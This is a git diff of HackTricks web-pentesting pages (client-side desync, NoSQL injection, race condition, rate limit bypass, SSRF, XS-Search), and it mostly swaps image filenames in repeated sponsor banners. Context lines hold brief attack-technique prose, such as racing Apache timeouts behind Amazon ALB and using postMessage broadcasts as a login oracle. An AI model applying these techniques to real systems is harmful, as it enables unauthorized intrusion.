+![](<../../.gitbook/assets/image (158).png>)
 
 If this works as expected, congratulations - you've found yourself a client-side desync!
 
@@ -160,7 +160,7 @@ When looking for CSD you can also **test semi-malformed** URLs like `/..%2f` or
 
 * **Coloured Exploit**
 
-![](<../../.gitbook/assets/image (5) (2).png>)
+![](<../../.gitbook/assets/image (5) (2) (1).png>)
 
 * **JS Exploit**
 
@@ -279,13 +279,13 @@ Just like Varnish, it's vulnerable on **endpoints where the server generates the
 
 If the vulnerable server (Apache or Varnish in this case) is in the back-end, a **front-end** that **streams the request to the back-end** server (http headers in this case) **without buffering** the entire request body is needed.
 
-![](<../../.gitbook/assets/image (3).png>)
+![](<../../.gitbook/assets/image (3) (3).png>)
 
 In this case the attacker **won't receive  the response timeout until he has send the body**. But if he knows the timeout this shouldn't be a problem.
 
 Amazon's Application Load Balancer (ALB) will **stream the data of the connection as needed**, but if it **receives** the **response** to the half request (the timeout) **before** receiving the **body**, it **won't send the body**, so a **Race Condition** must be exploited here:
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (2).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 There's an additional complication when it comes to **exploiting Apache behind ALB** - **both servers** have a default **timeout of 60 seconds**. This leaves an **extremely small time-window** to send the second part of the request. The RC attack was ultimately successful after 66 hours.
 

pentesting-web/nosql-injection.md

@@ -1,7 +1,7 @@
 # NoSQL injection
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -121,7 +121,7 @@ Using the **$func** operator of the [MongoLite](https://github.com/agentejo/cock
 ![](<../.gitbook/assets/image (468).png>)
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -272,7 +272,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

pentesting-web/race-condition.md

@@ -1,7 +1,7 @@
 # Race Condition
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -125,7 +125,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

pentesting-web/rate-limit-bypass.md

@@ -1,7 +1,7 @@
 # Rate Limit Bypass
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -84,7 +84,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

pentesting-web/ssrf-server-side-request-forgery/README.md

@@ -1,7 +1,7 @@
 # SSRF (Server Side Request Forgery)
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -198,7 +198,7 @@ if __name__ == "__main__":
 ```
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -321,7 +321,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

pentesting-web/xs-search.md

@@ -1,7 +1,7 @@
 # XS-Search
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -84,7 +84,7 @@ You can access the tool in [https://xsinator.com/](https://xsinator.com/)
 {% endhint %}
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -196,7 +196,7 @@ You can perform the same attack with **`portal`** tags.
 Applications often use [postMessage broadcasts](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage) to share information with other origins. Listening to this messages one could find **sensitive info** (potentially if the the `targetOrigin` param is not used). Also, the fact of receiving some message can be **used as an oracle** (you only receive this kind of message if you are logged in).
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -278,7 +278,7 @@ Browsers use sockets to communicate with servers. As the operating system and th
 For more info: [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/)
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -817,7 +817,7 @@ In an execution timing it's possible to **eliminate** **network factors** to obt
 * **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks)
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -935,7 +935,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\